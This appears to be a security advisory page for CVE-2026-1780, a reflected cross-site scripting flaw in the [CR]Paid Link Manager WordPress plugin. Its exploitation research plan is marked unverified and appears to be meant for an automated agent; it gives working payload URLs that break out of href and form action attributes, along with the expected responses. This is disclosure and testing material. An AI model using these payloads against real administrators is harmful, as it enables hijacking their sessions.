CVE-2026-1780

[CR]Paid Link Manager <= 0.5 - Reflected Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.1
CVSS Score
6.1
CVSS Score
medium
Severity
0.6
Patched in
1d
Time to patch

Description

The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL path in all versions up to, and including, 0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=0.5
PublishedMarch 17, 2026
Last updatedMarch 18, 2026
Affected plugincrpaid-link-manager

What Changed in the Fix

Changes introduced in v0.6

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# WordPress Exploitation Research Plan - CVE-2026-1780 ## 1. Vulnerability Summary The **[CR]Paid Link Manager** plugin for WordPress is vulnerable to **Reflected Cross-Site Scripting (XSS)** in versions up to and including 0.5. The vulnerability exists because the plugin directly echoes the values…

Show full research plan

WordPress Exploitation Research Plan - CVE-2026-1780

1. Vulnerability Summary

The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to and including 0.5. The vulnerability exists because the plugin directly echoes the values of $_SERVER["REQUEST_URI"] and $_SERVER["PHP_SELF"] within the administrative dashboard without any sanitization or escaping (e.g., using esc_url() or esc_attr()). This allows an unauthenticated attacker to craft a malicious URL that, when clicked by a logged-in administrator, executes arbitrary JavaScript in the context of the admin's browser session.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin.php
  • Vulnerable Parameter: URL path (via $_SERVER["PHP_SELF"]) and Query String (via $_SERVER["REQUEST_URI"]).
  • Authentication: None required for the attacker; however, the victim must be a logged-in user with administrative privileges (specifically capability 8, which translates to manage_options).
  • Preconditions: The plugin crpaid-link-manager must be installed and activated.
  • Vulnerable Code Sinks:
    • cr-paidlinkmanager.php:92: <a href='".$_SERVER["REQUEST_URI"]."&act=edit...'>
    • cr-paidlinkmanager.php:117: <a href="<?php echo $_SERVER["PHP_SELF"]."?page=cr_paid_link_manager_admin_menu"; ?>">
    • cr-paidlinkmanager.php:127: <form method="post" action="<?php echo $_SERVER["REQUEST_URI"]; ?>">

3. Code Flow

  1. A user with administrative privileges visits a URL crafted by the attacker, such as:
    wp-admin/admin.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E?page=cr_paid_link_manager_admin_menu
  2. WordPress routes the request to the cr_paid_link_manager_admin_menu() function because the page parameter matches the menu slug registered in cr_paid_link_manager_submit_config_admin().
  3. Inside cr_paid_link_manager_admin_menu(), the code encounters line 117:
    <a href="<?php echo $_SERVER["PHP_SELF"]."?page=cr_paid_link_manager_admin_menu"; ?>">Add new link group</a>
    
  4. $_SERVER["PHP_SELF"] contains the path info including the payload: /wp-admin/admin.php/"><script>alert(1)</script>.
  5. The payload breaks out of the href attribute and executes the script.
  6. Alternatively, if the act parameter is set to new or edit, line 127 executes:
    <form method="post" action="<?php echo $_SERVER["REQUEST_URI"]; ?>">
    
    $_SERVER["REQUEST_URI"] reflects the entire query string, allowing for similar attribute breakout.

4. Nonce Acquisition Strategy

This vulnerability does not require a nonce.
The reflected XSS occurs during a GET request to the admin dashboard. The plugin fails to use nonces or any other CSRF protection for the display logic of its admin pages. Since the goal is script execution via reflection, the attacker simply needs the victim to visit the page. The add_menu_page capability check (level 8) is the only barrier, which is bypassed because the victim (the administrator) is already authenticated.

5. Exploitation Strategy

Step 1: Admin Session Simulation

The automated agent must first authenticate as an administrator to access the vulnerable menu page.

Step 2: Form Reflection Attack (Vector 1)

Target the REQUEST_URI reflection in the form action.

  • URL: http://localhost:8888/wp-admin/admin.php?page=cr_paid_link_manager_admin_menu&act=new&xss_payload="><script>alert(document.domain)</script>
  • Tool: http_request
  • Method: GET
  • Expected Result: The response body will contain:
    <form method="post" action="/wp-admin/admin.php?page=cr_paid_link_manager_admin_menu&act=new&xss_payload="><script>alert(document.domain)</script>">

Step 3: Path Info Reflection Attack (Vector 2)

Target the PHP_SELF reflection in the "Add new link group" link.

  • URL: http://localhost:8888/wp-admin/admin.php/"><script>alert(window.origin)</script>?page=cr_paid_link_manager_admin_menu
  • Tool: http_request
  • Method: GET
  • Expected Result: The response body will contain:
    <a href="/wp-admin/admin.php/"><script>alert(window.origin)</script>?page=cr_paid_link_manager_admin_menu">Add new link group</a>

6. Test Data Setup

  1. Activate Plugin: Ensure crpaid-link-manager is active.
  2. No Data Required: The reflection in the act=new form (Line 127) and the footer link (Line 117) occurs regardless of whether any "Link Groups" exist in the database.

7. Expected Results

  • The HTTP response status will be 200 OK.
  • The response body will contain the literal, unescaped payload "><script>alert(...)</script>.
  • The payload will be found specifically inside an action attribute of a <form> tag or an href attribute of an <a> tag, effectively breaking out of the attribute and injecting a new HTML tag.

8. Verification Steps

  1. Manual Source Check: Search the response body for the string "><script>alert.
  2. Context Check: Confirm the reflection is occurring within the context of the PLManager admin page by verifying the presence of the header: <h2>[CR]Paid Link Manager - LINK Groups Configuration</h2>.

9. Alternative Approaches

If the act=new check fails or the tables are not initialized:

  • Use the Table Body Vector: Even if no groups exist, line 117 (PHP_SELF) is always rendered at the bottom of the group table.
  • Use act=delete: Line 144 also uses $_SERVER["REQUEST_URI"] for the deletion confirmation form:
    <form method="post" action="<?php echo $_SERVER["REQUEST_URI"]; ?>">
    Trigger this via: wp-admin/admin.php?page=cr_paid_link_manager_admin_menu&act=delete&group_id=0&xss="><script>confirm(1)</script>

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.